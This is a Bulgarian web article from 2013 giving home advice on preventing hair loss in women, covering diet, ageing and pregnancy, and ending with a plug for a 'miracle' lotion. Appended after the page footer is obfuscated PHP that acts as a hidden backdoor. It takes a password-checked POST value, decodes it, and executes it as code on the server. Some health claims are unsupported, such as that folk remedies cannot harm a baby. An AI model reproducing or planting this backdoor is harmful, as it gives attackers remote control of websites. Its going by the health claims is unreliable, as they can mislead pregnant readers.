Превенция на косопад при жените | Косопад

Предпазване от косопад при жените

Както отдавна е известно, нормално е да се губят по около 100 косъма на ден. Върху човешката глава обичайно има около 100 000, така че това не е проблем. Когато няма наличие на косопад, падналите косми се възстановяват незабавно от нови, които се раждат в космените фоликули, които пък са разположени точно под повърхността на скалпа.

kosopad pri zenite

Kosopad

Страшно е обаче, когато забележим първите признаци на косопад. Това е особено тежко при жените, тъй като при тях косата играе важна роля за добрия външен вид и самочувствие. За щастие съществуват много натурални домашни средства за превенция на косопад, както и за ускоряване растежа на космите.

Здравословно хранене

Като първа стъпка за превенция на косопад при жените, задължително трябва да актуализирате хранителния си режим и да си осигурите достатъчно количество свежи плодове и зеленчуци, както и да набавите допълнително витамини под формата на суплементи.

Препоръчително е храната да се купува от сигурно място, където не е обработвана с химикали за изкуствено увеличаване срока на годност. В България това съвсем не е лесно поради пълната липса на качествен контрол от страна на здравните служби, но при добро желание и с малко повече късмет, може да се намерят и екологични продукти. Химикалите в храните са сред основните фактори, предизвикващи не само косопад, но и всякакви здравословни проблеми.

Възрастта

Не забравяйте, че с напредването на възрастта и жените, и мъжете, започват да губят много косми. При дамите е характерно изтъняване на косата и се появява така наречения „женски модел на оплешивяване”, особено след настъпването на менопаузата. В този случай е добре да се посъветвате със специалист, който ще ви препоръча подходящ препарат. За съжаление, превантивните мерки при такава ситуация не са много.

Косопад при бременни и родилки

Бременните жени и младите кърмачки са сред най – рисковите групи за поява на косопад. Ако това сполети и вас в такъв момент, най – добре е да се обърнете към народната медицина и да използвате изпитани рецепти. Те няма да навредят нито на вас, нито на бебето и ако уцелите правилните средства, косата ви ще остане все така здрава и силна. Също така на всяка цена трябва да си осигурите здравословна и разнообразна храна, богата не само на витамини и минерали, но и на протеини. Хубавото е, че в срок до шест месеца след раждане, косопадът спира и се възстановяват старите нива.

Заключение

Изводът, който бихме могли да направим е, че превенцията на косопад при жените се осъществява чрез здравословно хранене, прием на достатъчно количество витамини и минерали, лишен от стрес начин на живот, третиране с рецепти против оплешивяване и специални препарати като лосионът – чудо срещу косопад „Ефект – 2”.

26. април 2013 18:30:45 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}